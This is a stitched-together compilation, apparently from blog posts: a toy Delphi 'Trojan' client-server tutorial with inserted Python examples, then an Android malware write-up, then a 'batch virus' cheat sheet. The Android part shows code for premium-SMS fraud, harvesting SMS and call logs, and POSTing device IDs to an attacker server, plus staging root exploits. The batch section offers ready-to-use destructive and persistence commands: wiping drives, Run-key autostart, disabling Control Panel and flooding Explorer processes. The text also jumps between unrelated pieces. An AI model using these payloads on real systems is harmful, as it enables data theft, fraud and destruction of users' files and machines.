If you want to see how “server-client” programs are written and how they work on a real example, read this post to the end. It will be interesting!

I decided to write the example program in Delphi, because it is simpler and works well for a small but real example. As for the formidable word “Trojan” that I mentioned above: what we get here really is a Trojan, but with tiny and harmless functionality.

You will learn how such programs are written and how they work from the inside. But there is one “but”: real Trojans are not written this way, for reasons explained below. In our example the “server” part of the program is large (unacceptable for a real Trojan), and we will not hide it in the system. With real malware things are a little different.

The server part is developed to be small, roughly 100 KB give or take, and it is hidden in the system so that it takes a long time to find.

Otherwise the development principle is the same, and this example is ideal for understanding how programs built on the “server-client” principle work. We simply will not go down the road of building a real Trojan. Do we need to? No! We are the good guys and are not going to misbehave.

How programs work based on the “Server-Client” principle

Simply and in a nutshell, the picture looks like this. You run the “client” part of the program; as a rule it has a GUI, that is, a user interface (unless the client is a console one).

On the computer you want to access, the “server” part of the program runs. It opens (listens on) a specific port on that computer and has no visible window. Note that “invisible” only means no window: the listening port itself shows up in netstat, as we will see below.

Connections go through this port. In the client you specify the port and the IP address of the computer on which the server is running, connect to the server, and can then perform actions on the remote PC from your own computer.

I hope the explanation is clear and in plain human language. If something is not clear, it will become clear with the example. Next, let's decide what actions our little Trojan will perform on the remote PC.

What functionality this example of a server-client program has

Honestly, at this stage, when I was thinking about what to show, I hesitated and could not come up with anything interesting. So let the functionality consist of one terribly simple capability:

- The user will receive your message.

I see no point in adding other features, since for the sake of the example and understanding this is quite enough. You also should not have to read a lot of code; what is below is enough to look at the program from the inside.

And the message can be anything; it depends on the imagination and programming knowledge of whoever decided to write the Trojan.

So we will have a joke like this: a person sitting at the computer will suddenly receive a message, for example

“Hello, I'm hanging around your computer”

Can you imagine the person's reaction? I think it's funny; it would be nice to see their face!

Developing a program based on the “server-client” principle

Let's get to the fun part! We will start by developing the “server”, then write a client for it. I will not explain the program code in detail, I will simply give examples; after all, this is not a programming blog, and the purpose of the post is to show step by step how programs of the “server-client” type are developed.

Server development

First we need to teach the “server” to open a port on the computer so that the “client” can connect to it later, and only after that we will teach it to accept commands and perform actions on the PC.

Let's open the port with the following, painfully simple, code:

Delphi/Pascal

procedure TForm1.FormCreate(Sender: TObject);
begin
  ServerSocket1.Port := 666;
  ServerSocket1.Active := True;
end;

Now if you run the program, a plain empty window appears without any buttons or other elements. And most importantly, port 666 is now open on the computer, on all network interfaces and with no authentication whatsoever. It is to this port that we will later send commands, and the server in turn will process them.

For now, let's make sure the server is running and the port is open: remember the netstat command (for example netstat -an | findstr :666 in a command prompt) and look at the result.

As we can see, launching our program did indeed open port 666 on the computer. That means only one thing: the program works, and it is time to teach the “server” to receive the message.

Delphi/Pascal

procedure TForm1.ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket);
var
  komm: string;
begin
  // whatever bytes have arrived so far from this client
  komm := Socket.ReceiveText;
  // the first 12 characters are the command tag, the rest is the payload
  if Copy(komm, 1, 12) = 'MESSAGE_TEXT' then
  begin
    Delete(komm, 1, 12);
    ShowMessage(komm);
  end;
end;

Here things are as follows. If the server receives a command named “MESSAGE_TEXT” (the name can be anything), the ShowMessage procedure fires and shows the text that arrived together with the command and is held in the string variable komm. Two caveats a real implementation would have to handle: ReceiveText returns whatever bytes have arrived so far, so on a slow link the 12-character tag and the text may arrive in separate reads, and nothing checks who sent the command, so anyone who can reach the port can pop up a message.

Accordingly, we will type the text of the message in the “client”, and it can have any content.

That's all for the development of the “server” part. As a result we got the file Server.exe, which we will put aside for now until we write the “client”.

Client development

For obvious reasons, our client will have a graphical user interface (GUI) with controls: buttons and input fields. I ended up with this layout:

Let's go over all the elements. Although it's clear, as they say, I'll explain just in case.

- IP: field for entering the IP address of the computer where the server is running.
- Port: the port number on which the server listens.
- Connect: button to connect to the server.
- Text message: field for entering the message to be sent.
- Send a message…: accordingly, the button that sends the message.
- Connection status: here we will see whether we are connected or not.

Delphi/Pascal

procedure TForm1.Button1Click(Sender: TObject);
begin
  ClientSocket.Host := IP.Text;
  ClientSocket.Port := StrToInt(Port.Text);
  ClientSocket.Open;
end;

You could start the program right now and try to connect to the “server”, but we would not know the result, whether we connected or not. Before testing, let's fix that and teach the program to show the connection result.

Delphi/Pascal

procedure TForm1.ClientSocketConnect(Sender: TObject; Socket: TCustomWinSocket);
begin
  Label4.Caption := 'Successfully connected to: ' + IP.Text;
  Label4.Font.Color := clGreen;
end;

And for the case where we could not connect to the server, for example because the “server” is not running on the remote PC and, accordingly, port 666 is closed:

Delphi/Pascal

procedure TForm1.ClientSocketError(Sender: TObject; Socket: TCustomWinSocket;
  ErrorEvent: TErrorEvent; var ErrorCode: Integer);
begin
  // 10061 is WSAECONNREFUSED: nothing is listening on that port
  if ErrorCode = 10061 then
  begin
    ClientSocket.Active := False;
    Label4.Font.Color := clRed;
    Label4.Caption := 'Failed to connect to: ' + IP.Text;
    ErrorCode := 0; // cleared so the component does not raise an exception
  end;
end;

Now let's see how the program works. First we start the client but not the server, to check whether the message stating that the connection failed is displayed.
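The exchange described above, as an added Python example that is not part of the original post: both sides of the MESSAGE_TEXT command over a raw TCP socket, with the server checking the 12-character tag the way the Delphi ServerSocket1ClientRead handler does. Two things are this example's own additions rather than the post's: each command ends with a newline so the server can tell where it ends (TCP is a byte stream, and the tag and the text may arrive in separate reads), and unknown tags get an ERR reply instead of being silently ignored. The server binds the loopback address and lets the OS choose the port; the OK/ERR replies, the read timeout, the frame limit and the MessageServer class are assumptions of this example, and nothing is hidden or installed.

```python
import socket
import threading

COMMAND_TAG = b"MESSAGE_TEXT"   # the 12-character command tag the Delphi server checks
MAX_FRAME = 4096                # assumption: refuse frames longer than this


def parse_command(frame: bytes):
    """Return (tag, text) for a known command, or None for anything else."""
    if not frame.startswith(COMMAND_TAG):
        return None
    return COMMAND_TAG.decode(), frame[len(COMMAND_TAG):].decode("utf-8", "replace")


def serve_one_client(conn, received: list) -> None:
    """Read until a newline so a tag split across two recv() calls is still parsed whole."""
    buf = b""
    conn.settimeout(10)                     # a client that connects and never speaks is dropped
    with conn:
        try:
            while b"\n" not in buf:
                chunk = conn.recv(1024)
                if not chunk:
                    return                  # peer closed before sending a full frame
                buf += chunk
                if len(buf) > MAX_FRAME:
                    conn.sendall(b"ERR frame too long\n")
                    return
        except socket.timeout:
            return
        frame = buf.split(b"\n", 1)[0]
        parsed = parse_command(frame)
        if parsed is None:
            conn.sendall(b"ERR unknown command\n")
            return
        received.append(parsed[1])          # the Delphi version calls ShowMessage() here
        conn.sendall(b"OK\n")


class MessageServer:
    """Loopback-only listener; port 0 lets the OS pick a free port (the text uses 666)."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.sock.settimeout(0.2)           # lets the accept loop notice stop()
        self.port = self.sock.getsockname()[1]
        self.received = []
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._accept_loop, daemon=True)
        self._thread.start()

    def _accept_loop(self):
        while not self._stop.is_set():
            try:
                conn, _ = self.sock.accept()   # accepted sockets are blocking again
            except socket.timeout:
                continue
            except OSError:
                break
            serve_one_client(conn, self.received)
        self.sock.close()

    def stop(self):
        self._stop.set()
        self._thread.join()


def send_command(port: int, tag: str, text: str, host: str = "127.0.0.1") -> str:
    """Client side: one framed command per connection, returns the server's reply line."""
    with socket.create_connection((host, port), timeout=5) as c:
        c.sendall(tag.encode() + text.encode() + b"\n")
        return c.makefile("rb").readline().rstrip(b"\n").decode()


def port_is_listening(port: int, host: str = "127.0.0.1") -> bool:
    """The same check the text does with netstat, done by attempting a connection."""
    try:
        with socket.create_connection((host, port), timeout=1):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    server = MessageServer()
    print("listening:", port_is_listening(server.port))
    print(send_command(server.port, "MESSAGE_TEXT", "Hello, I'm hanging around your computer"))
    print("server received:", server.received)
    server.stop()
```

Change the bind address to 0.0.0.0 and you have exactly the exposure the Delphi server has: anyone who can reach the port can push a message. That, not the message box, is what to fix before shipping anything like this.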

The collections of malicious Android applications at some antivirus labs already contain more than 10 million samples. The figure excites the imagination, but roughly 9,995,000 of them are renamed copies of the original viruses. If you analyse the source code of the remaining few thousand malware samples, you will notice that they are all assembled from a small number of unique functional blocks, modified and combined in different ways.

The thing is that malware authors most often pursue very trivial goals:

  • send an SMS to a premium-rate number;
  • take possession of the user's confidential information (telephone numbers, message texts, data from the SD card, and so on);
  • collect data about the infected device;
  • take over administrative rights on the device (to install applications without the owner's permission or to maliciously disable the device);
  • capture logins, passwords and payment card data that the user enters on the websites of Internet banking systems.

How do they do it? Let's try to penetrate the dark world of mobile virus writing and see what happens there.

Sending SMS

Who uses:

  • AdSms;
  • FakePlayer;
  • HippoSms.

The most common type of virus is the SMS Trojan. These viruses simply send messages to premium-rate numbers without the user's consent. Creating such a program, or rewriting a ready-made one for the desired number, is very easy. And monetising it is extremely simple, unlike, for example, tracking banking data.

Below is the simplest example of the code. It is the basic SMS-sending function. It can be made more elaborate by checking the sending status, selecting numbers depending on the subscriber's location, and then deleting the SMS.

import android.telephony.SmsManager;

private static boolean sendSms(String destNumber, String smsText) {
    // Try to call the sendTextMessage method of SmsManager (the standard way to send SMS
    // from the current device) with the minimum parameters: recipient number and message text
    try {
        SmsManager.getDefault().sendTextMessage(destNumber, null, smsText, null, null);
        return true;
    } catch (Exception e) {
        return false;
    }
}

Where to look for the virus code

In the vast majority of cases a phone is infected by installing an application. Any Android application exists as a file with the .apk extension, which is essentially a ZIP archive. You can inspect its contents using the Android SDK, a converter from DEX/APK to JAR, and a Java bytecode decompiler. An application build (APK) consists of the following parts:

  • resources.arsc - the compiled resource table;
  • res (folder) - the actual resources (icons and so on);
  • META-INF (folder) - the files of the APK signature: MANIFEST.MF with digests of every file in the archive, a .SF file with digests of the manifest entries, and a .RSA/.DSA file with the signature and the application's certificate;
  • AndroidManifest.xml - all kinds of service information, including the permissions the application requests at installation (stored as binary XML, so it has to be decoded before reading);
  • classes.dex - you have probably heard that on Android all code is executed by the Dalvik virtual machine (ART appears in version 4.4 and is the default from 5.0), which does not understand ordinary Java bytecode. That is why there are files with the .dex extension. Alongside the necessary and useful classes (those responsible for the application's functionality), a trojanised app's classes.dex also contains the malicious ones, the virus code we analyse in this article.
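An added example (not from the article) of the first triage step a reviewer takes on an APK before decompiling it: open it as the ZIP archive it is, bucket the entries into the parts listed above, and check that each classes.dex really has the header the Dalvik format prescribes (magic, Adler-32 checksum over offset 12 onwards, SHA-1 signature over offset 32 onwards, file_size, header_size 0x70 and the endian tag). A file that fails these checks is truncated, tampered with or not a dex at all, and a decompiler will choke on it. The sample APK and the header-only dex are constructed inside the block so it runs offline; the binary AndroidManifest.xml is left as a placeholder because decoding it needs aapt or apktool.

```python
import hashlib
import io
import struct
import zipfile
import zlib

DEX_MAGIC_PREFIX = b"dex\n"        # full magic is "dex\n" + 3-digit version + NUL, e.g. "dex\n035\0"
DEX_HEADER_SIZE = 0x70
DEX_ENDIAN_CONSTANT = 0x12345678


def classify_entry(name: str) -> str:
    """Bucket a zip entry into the APK parts listed in the text."""
    if name in ("AndroidManifest.xml", "resources.arsc"):
        return name
    if name.startswith("classes") and name.endswith(".dex"):   # classes.dex, classes2.dex, ...
        return "dex"
    if name.startswith("res/"):
        return "res/"
    if name.startswith("META-INF/"):
        return "META-INF/"
    return "other"


def check_dex_header(dex: bytes) -> dict:
    """Validate the header fields a truncated, tampered or fake classes.dex gets wrong."""
    result = {"magic": False, "checksum": False, "signature": False, "sizes": False, "endian": False}
    if len(dex) < DEX_HEADER_SIZE or not dex.startswith(DEX_MAGIC_PREFIX) or dex[7] != 0:
        return result
    result["magic"] = True
    (stored_checksum,) = struct.unpack_from("<I", dex, 8)
    stored_signature = dex[12:32]
    file_size, header_size, endian_tag = struct.unpack_from("<3I", dex, 32)
    # Per the dex format: the adler32 checksum covers everything after itself (offset 12 to EOF),
    # and the SHA-1 signature covers everything after itself (offset 32 to EOF).
    result["checksum"] = stored_checksum == (zlib.adler32(dex[12:]) & 0xFFFFFFFF)
    result["signature"] = stored_signature == hashlib.sha1(dex[32:]).digest()
    result["sizes"] = file_size == len(dex) and header_size == DEX_HEADER_SIZE
    result["endian"] = endian_tag == DEX_ENDIAN_CONSTANT
    return result


def triage_apk(apk_bytes: bytes) -> dict:
    """Inventory the archive in memory and check every dex header; nothing is extracted to disk."""
    parts = {"AndroidManifest.xml": [], "resources.arsc": [], "res/": [], "META-INF/": [], "dex": [], "other": []}
    dex_checks = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            bucket = classify_entry(info.filename)
            parts[bucket].append(info.filename)
            if bucket == "dex":
                dex_checks[info.filename] = check_dex_header(zf.read(info))
    # No manifest or no code means this is not an installable application at all
    missing = [p for p in ("AndroidManifest.xml", "dex") if not parts[p]]
    return {"parts": parts, "dex_checks": dex_checks, "missing": missing}


def build_minimal_dex() -> bytes:
    """Constructed sample: a header-only dex (no classes) with a correct checksum and signature."""
    tail = struct.pack("<3I", DEX_HEADER_SIZE, DEX_HEADER_SIZE, DEX_ENDIAN_CONSTANT)
    tail += b"\0" * (DEX_HEADER_SIZE - 32 - len(tail))        # remaining header fields all zero
    signature = hashlib.sha1(tail).digest()
    checksum = zlib.adler32(signature + tail) & 0xFFFFFFFF
    return b"dex\n035\0" + struct.pack("<I", checksum) + signature + tail


def build_sample_apk(dex: bytes = None) -> bytes:
    """Constructed sample APK with the parts the article lists; the manifest is a placeholder."""
    dex = build_minimal_dex() if dex is None else dex
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed placeholder: real manifests are binary XML>")
        zf.writestr("resources.arsc", b"\x02\x00\x0c\x00constructed")
        zf.writestr("res/drawable/icon.png", b"\x89PNG constructed")
        zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\r\n")
        zf.writestr("META-INF/CERT.RSA", b"constructed")
        zf.writestr("classes.dex", dex)
        zf.writestr("assets/payload.bin", b"constructed")
    return buf.getvalue()


if __name__ == "__main__":
    report = triage_apk(build_sample_apk())
    for bucket, names in report["parts"].items():
        print(f"{bucket:20s} {names}")
    print("dex header checks:", report["dex_checks"])
```

On a real file the call is triage_apk(open("app.apk", "rb").read()); if every dex check passes, dex2jar or apktool can do the decompilation the text refers to, and anything in the "other" bucket (assets, lib/) deserves a look of its own, since that is where dropped binaries tend to hide.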

Recording user information to a text file

Who uses:

  • NickySpy;
  • SmsSpy.

There is a category of viruses that preys on users' personal data. Their mechanism is also simple: they either upload the user's files to their creator's server, or first collect some data into a text file (TXT, CSV, XML, it doesn't matter). Attackers may be interested in contacts of any kind, messages from various instant messengers, media files, and so on.

SMS messages from infected users are especially valuable for the phone numbers of senders and recipients: they can be used to pad the database for spam mailings. Less commonly, viruses of this kind are used to infect the devices of specific individuals, so the next time your girlfriend invites you to test the Android application she wrote (ah, caramba! - Ed.), don't let your guard down :).

// Count the SMS messages in the received intent (each PDU is one message)
Object[] arrayOfObject = (Object[]) localBundle.get("pdus");
int j = arrayOfObject.length;
// Loop through each SMS
int i = 0;
while (true) {
    if (i >= j) break;
    // Create an SMS message object from the raw PDU
    SmsMessage localSmsMessage = SmsMessage.createFromPdu((byte[]) arrayOfObject[i]);
    // Put the sender's number, the text and the send time into string variables
    String MessageNumber = localSmsMessage.getOriginatingAddress();
    String MessageText = localSmsMessage.getDisplayMessageBody();
    long l = localSmsMessage.getTimestampMillis();
    Date localDate = new Date(l);
    String MessageTimeDate = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(localDate);
    // Build a record from the collected data and append it to a text file with the custom WriteRec method
    String MessageInfo = MessageNumber + "#" + MessageText + "#" + MessageTimeDate + ";";
    WriteRec(paramContext, "sms.txt", MessageInfo);
    // Move to the next message
    i += 1;
}

It is also convenient to pad the spam list from the subscriber's call history. This code runs when an outgoing call is placed:

if (paramIntent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL")) {
    // Put the dialled number into a variable
    String phonenumber = paramIntent.getStringExtra("android.intent.extra.PHONE_NUMBER");
    // Build a record from the number and the time of the call
    String PhoneCallRecord = phonenumber + "#" + getSystemTime();
    // Call WriteRec() (its code is not given here), which appends a line to the call-history text file
    WriteRec(paramContext, "phonecall.txt", PhoneCallRecord);
}

After the information is recorded, it is forwarded into the “right hands”. The code below uploads the call history to the server:

private void uploadPhonecallHistory() throws IOException {
    while (true) {
        // Wait until the file we need exists
        if (!fileIsExists("/data/data/spyapp.pg/files/phonecall.txt")) continue;
        // Create the file uploader object
        UploadFiles localUploadFiles = new UploadFiles();
        String uploadkeynode = getKeyNode("uid", "uid_v");
        // Run advanceduploadfile (its code is not given here) to upload the file to the malware author's server
        localUploadFiles.advanceduploadfile(uploadkeynode, "/data/data/spyapp.pg/files/phonecall.txt");
        return;
    }
}

Collection of information

Who uses:

  • DroidKungFu;
  • DroidDream;
  • the vast majority of malware of all similar types.

In principle, any malware author benefits from information about the devices infected by his programs, and it is very easy to get. An array is built with data about the phone's properties (the full list is in the Android developer documentation) and sent as a POST request to a PHP script (the language does not matter) on the attacker's server, which processes the data and stores it in a database for later use.

private void reportState(int paramInt, String paramString) {
    // Create a list and put the device's service information into it
    ArrayList<NameValuePair> UserInformation = new ArrayList<NameValuePair>();
    UserInformation.add(new BasicNameValuePair("imei", this.mImei));
    UserInformation.add(new BasicNameValuePair("taskid", this.mTaskId));
    UserInformation.add(new BasicNameValuePair("state", Integer.toString(paramInt)));
    // If the optional "comment" parameter is set, add it as well
    if ((paramString != null) && (!"".equals(paramString)))
        UserInformation.add(new BasicNameValuePair("comment", paramString));
    // Create an HTTP POST request addressed to the script that collects the data
    HttpPost localHttpPost = new HttpPost("http://search.virusxxxdomain.com:8511/search/rtpy.php");
    try {
        // Attach the data as a form body and execute the request with the standard HTTP client
        localHttpPost.setEntity(new UrlEncodedFormEntity(UserInformation, "UTF-8"));
        new DefaultHttpClient().execute(localHttpPost).getStatusLine().getStatusCode();
    } catch (IOException e) {
        // errors are swallowed: a lost report is simply lost
    }
}

Rooting

Who uses:

  • DroidKungFu;
  • DroidDream;
  • RootSmart.

One of the worst things that can happen to an Android device is being rooted by a virus. After that a malicious program can do anything with it: install other viruses, change settings, disable hardware. This is done by launching exploits one after another:

private void RootFunc() {
    ApplicationInfo localApplicationInfo = getApplicationInfo();
    /* "ratc" is a copy of the well-known Rage Against The Cage root exploit.
       "killall" stops all processes started by the current application.
       "gjsvro" is an exploit for obtaining udev rights (udev is used on Linux systems
       for advanced work with hardware and network interfaces).
       Copy all of them from the APK's assets into the app's private directory */
    String dir = "/data/data/" + localApplicationInfo.packageName;
    Utils.copyAssets(this, "ratc", dir + "/ratc");
    Utils.copyAssets(this, "killall", dir + "/killall");
    Utils.copyAssets(this, "gjsvro", dir + "/gjsvro");
    // Make them executable (with the set-uid bit) through the command line
    Utils.oldrun("/system/bin/chmod", "4755 " + dir + "/ratc");
    Utils.oldrun("/system/bin/chmod", "4755 " + dir + "/killall");
    Utils.oldrun("/system/bin/chmod", "4755 " + dir + "/gjsvro");
    // The thread that launches them (its code is not given in the article)
    new MyThread().start();
}

Websites about mobile malware

Kaspersky Lab experts' blog. This resource contains high-quality and detailed articles about many aspects of computer security, including Android viruses. It is worth visiting regularly to keep up with the latest developments.

Androguard. A group dedicated to an open-source tool for all kinds of manipulation of Android application code (decompilation and modification of DEX/ODEX/APK files, and so on). Androguard also hosts an extensive collection of articles about viruses. Besides short reviews of functionality and protection methods, there are detailed analyses of malware code.


Mobile Threats section at www.fortiguard.com. An encyclopedia of phone viruses. Each article is a review of functionality seasoned with a significant amount of technical detail. In addition to information about threats to Android, there are also articles about viruses for Symbian OS, iOS and other platforms.


Virus protection

Some users believe that downloading applications exclusively from Google Play and installing an antivirus on the smartphone absolutely guarantees security. Don't delude yourself: reports of malware found on the official market appear regularly, and the number of newly appearing malicious programs is measured in hundreds of thousands per month, which makes it hard for antivirus databases to keep up. A real guarantee of safety comes from manually reviewing the code of the APK file before installing it on your phone. You don't need to be a coding guru to spot malicious snippets, and this article will help you with that.

Conclusion

As we can see from the examples, mobile virus writing is nothing special in terms of technological complexity. Of course, these examples are simplified to fit the magazine format: first of all, error and exception handlers are omitted, as well as some technical details whose absence will not stop you from understanding the principles of Android malware, but will protect you from unnecessary experiments. We don't support the creation of viruses, do we? 🙂

Here are the commands:

assoc .exe=.mp3 - breaks the .exe file association: executables are treated as the .mp3 type and no longer run as programs
label E: pridurok - changes the volume label of drive E: to “pridurok” (Russian for “idiot”)
time 00:00 - changes the system time
date 03.13.36 - changes the system date
assoc .lnk=.txt - shortcuts (.lnk) are treated as text files
copy %0 F:\Work.bat - copies the running batch file itself (%0 is its own path) to F:

1) A batch file that deletes the files from a flash drive (if one is inserted as F:) and renames it:
del F:\*.* /q
label F:HACK
2) A batch file that changes the date and time on the computer and copies itself to drive C: and to the flash drive:
time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat
----------
>nul - appended to a command, hides that command's output
%SystemRoot%\system32\rundll32 user32,SwapMouseButton - swaps the mouse buttons
---------------
copy "%0" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "File1" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
A very cruel trio: the first line copies the batch file into system32, the second registers it in the Run key so it starts with the OS, and the third hides the Control Panel through an Explorer policy. Writing to HKLM and to system32 needs administrator rights, and the Run key is the first place any incident responder looks.
“del x:\y\*.* /q” - deletes all files on drive x in folder y (but not subfolders) without prompting (example: del F:\Data\*.* /q);
“net user x /add” - adds a local user named x (example: net user Smoked /add); needs administrator rights;
“@echo off” is put at the beginning of the batch file so the commands are not echoed to the console as they run
rundll32 user,disableoemlayer - “system crash”: disables all input/output (keyboard, display, mouse). The result is a black screen with a cursor and a system that responds to nothing, although Windows keeps running. This calls the 16-bit user.exe and only works on Windows 9x; on NT-based Windows rundll32 cannot load it.
del *.* /q - deletes all files (but not folders) in the folder the batch file was launched from, without prompting
md 1 - creates a folder named 1
To run a file at Windows startup on DOS/Windows 9x, rename it to Autoexec.bat (NT-based Windows ignores that file; there the Run key above is used instead)
echo Virus Loading - prints “Virus Loading” on the screen
del c:Program Files/q - meant to delete all files from Program Files, but as written the path is neither quoted nor correctly terminated, so it does not do what the author intends
reg - direct work with the registry. Run reg /? and read it, everyone!
rcp - copies files to or from a host running the rcp service (ASCII mode)
runas - runs a program as another user
tasklist - lists running processes and the sessions associated with them
taskkill - terminates one or more processes
tftp - trivial FTP client
tskill - terminates a process
reg - the registry utility (see above)
bootcfg - edits boot.ini settings
append - lets programs open data files in the listed directories as if they were in the current directory
getmac - shows the MAC address(es)
logoff - logs off the user session
mem - displays the amount of used and free memory
mqbkup - Message Queuing backup/restore
netsh - network shell: configures network interfaces, the firewall and so on from the command line
openfiles - lists files opened on the system
rsh - runs commands on remote hosts running the rsh service
sc - Service Control: creates, starts, stops and queries services from the command line
rexec - runs commands on remote hosts running the rexec service
shutdown - shuts down (hehe) the local or a remote computer
systeminfo - displays information about the computer
schtasks - task scheduler
xcopy - copies files and directory trees
tsshutdn - shuts down a terminal server in an orderly way
set - displays, sets and deletes cmd.exe environment variables. The same variables are under System Properties (“My Computer”) - Advanced - Environment Variables; not all of them are there, but a lot. A plain “set” shows everything.
By the way, here are some rundll32 calls that can be used in batch files. Most of this list dates from Windows 98: entries that name user, keyboard, mouse, krnl386, rnaui, diskcopy or setupx call 16-bit libraries and do nothing on NT-based Windows (2000 and later), where rundll32 loads only 32/64-bit DLLs. The shell32 and .cpl entries still work.

rundll32 user,wnetdisconnectdialog
Opens the “Disconnect Network Drive” dialog

rundll32 user,disableoemlayer
Provokes a failure (the black screen described above)

rundll32 user,repaintscreen
Repaints the screen

rundll32 user,setcursorpos
Moves the mouse cursor to the top-left corner

rundll32 diskcopy,DiskCopyRunDll
Opens the “Copy Disk” window

rundll32 rnaui.dll,RnaWizard /1
Opens the “Make New Connection” wizard (/1 = without the window)

rundll32 shell,shellexecute
Opens an Explorer window at the root directory

rundll32 shell32,OpenAs_RunDLL
Opens the “Open With...” dialog

rundll32 shell32,SHFormatDrive
Opens the “Format: 3.5 Floppy (A:)” dialog

rundll32 shell32,ShellAboutA
Opens the “About Windows” box

rundll32 shell32,SHExitWindowsEx 0
Restarts Windows 98 (without re-running autoexec.bat and so on)

rundll32 shell32,SHExitWindowsEx 1
Shuts down Windows 98

rundll32 shell32,SHExitWindowsEx 2
Reboots the Windows 98 PC

rundll32 shell32,SHExitWindowsEx -1
Restarts the Windows 98 Explorer shell

rundll32 shell32,Control_RunDLL
Opens the Control Panel

rundll32 shell32,Control_RunDLL desk.cpl
Opens “Display Properties”

rundll32 shell32,Control_RunDLL main.cpl
Opens the Control Panel module from MAIN.CPL

rundll32 krnl386.exe,exitkernel
Exits Windows without any messages or questions

rundll32 user,swapmousebutton
Swaps the mouse buttons

rundll32 keyboard,disable
Disables the keyboard

rundll32 mouse,disable
Disables the mouse

rundll rnaui.dll,RnaDial “provider”
Opens the dial-up connection dialog for the connection named “provider”

rundll32 user,tilechildwindows
Tiles all non-minimised windows from top to bottom

rundll32 user,cascadechildwindows
Cascades all non-minimised windows

rundll32 sysdm.cpl,InstallDevice_Rundll
(the only option in Windows 98) installs non-Plug&Play hardware

rundll32 msprint2.dll,RUNDLL_PrintTestPage
Select a printer in the menu that appears and send it a test page

rundll32 user,setcaretblinktime
Sets a new cursor blink rate

rundll32 user, setdoubleclicktime
Sets a new double-click speed

rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf
Shows the “System Settings Change. Do you want to restart your computer now? Yes/No” prompt

ASSOC - Displays or modifies file extension associations
AT - Schedules commands and programs to be executed on the computer.
ATTRIB - Displays or changes file attributes.
BREAK - Sets or clears extended CTRL+C checking.
CACLS - Displays or modifies access control lists (ACLs) for files.
CALL - Calls one *.BAT file from another.
CD - Displays the name of or changes the current directory.
CHCP - Displays or sets the active code page number.
CHDIR - Displays the name of or changes the current directory.
CHKDSK - Checks the disk and displays a status report.
CLS - Clears the screen.
CMD - Starts a new instance of the Windows NT command interpreter.
COLOR - Sets the default colors for the foreground and background of the console.
COMMAND - Starts a new copy of the Windows command interpreter.
COMP - Compares the contents of two files or sets of files.
COMPACT - Displays or modifies file compression on Windows NT (NTFS) partitions.
CONVERT - Converts FAT volumes to the Windows NT file system (NTFS). You cannot convert the current drive.
COPY - Copies one or more files to another place.
CTTY - Changes the terminal device used to control your system.
DATE - Displays or sets the date.
DEL - Deletes one or more files.
DEBUG - Runs Debug, a program testing and editing tool.
DIR - Displays a list of files and subdirectories in a directory.
DISKCOMP - Compares the contents of two floppy disks.
DISKCOPY - Copies the contents of one floppy disk to another.
DOSKEY - Edits command lines, recalls Windows commands, and creates macros.
ECHO - Displays messages, or turns command output on/off.
EMM386 - Enables/disables EMM386 extended memory support.
ENDLOCAL - Ends localization of environment changes in a *.BAT file.
ERASE - Deletes one or more files.
EXIT - Terminates program execution (command interpreter).
EXTRACT - A tool for extracting information from CAB files.
FC - Compares two files or sets of files, and displays the differences between them.
FIND - Searches for a text string in a file or files.
FINDSTR - Search for strings in files.
FOR - Executes the specified command for each file in a set of files.
FORMAT - Formats the disk for use with Windows.
FTYPE - Displays or modifies the file types used in extension associations.
GOTO - Directs the Windows NT command interpreter to the marked line in the *.BAT file.
GRAFTABL - Enables Windows to display an extended character set in graphics mode.
HELP - Provides Help information for Windows commands.
IF - Performs condition processing in a *.BAT file.
KEYB - Configures the keyboard for the specified language.
LABEL - Creates, modifies, or deletes a volume label on a disk.
LOADHIGH (LH) - Loads a program into upper memory.
MD - Creates a directory.
MEM - Displays the amount of used and free memory on your system.
MKDIR - Creates a directory.
MODE - Configures the system device.
MORE - Displays the output of one screen at a time.
MOVE - Moves one or more files from one directory to another on the same disk.
NETSTAT - Displays protocol statistics and current TCP/IP network connections.
NLSFUNC - Loads country-specific information.
PATH - Displays or sets the search path for executable files.
PAUSE - Pauses processing of the *.BAT file and displays a message.
POPD - Restores the previous value of the current directory saved by PUSHD.
PRINT - Prints a text file.
PROMPT - Changes the Windows command prompt.
PUSHD - Saves the current directory, then changes it.
RD - Removes a directory.
RECOVER - Recovers readable information from a bad or defective disk.
REM - Writes comments (notes) to *.BAT files or CONFIG.SYS.
REN - Renames a file or files.
RENAME - Renames the file or files.
REPLACE - Replaces files.
RESTORE - Restores files that were backed up using the BACKUP command.
RMDIR - Deletes a directory.
SET - Displays, sets or deletes Environment Variables Windows.
SETLOCAL - Starts localizing environment changes to the *.BAT file.
SETVER - Sets the MS-DOS version number that Windows reports to a program.
SHIFT - Shifts the position of replaceable parameters in a *.BAT file.
SMARTDRV - Installs and configures the SMARTDrive disk-caching utility.
SORT - Sorts the input stream.
START - Starts a separate window to run a specified program or command.
SUBST - Associates a path with a drive letter.
SYS - Copies the MS-DOS system files and command interpreter to the disk you specify.
TIME - Displays or sets the system time.
TITLE - Sets the window title for the session.
TREE - Graphically displays the directory structure in the drive or path.
TYPE - Displays the contents of a text file.
VER - Displays the Windows version.
VERIFY - Tells Windows whether to verify that files are written correctly to a disk.
VOL - Displays the disk volume label and serial number.
XCOPY - Copies files and directory trees.

Well, if you want to “kill” Windows:
@echo off
start explorer
start explorer
start explorer
start explorer
Repeat the start line 100 times and add the file to startup. Every line spawns another Explorer process, and a hundred of them at each logon leave the machine with no memory or handles to spare.
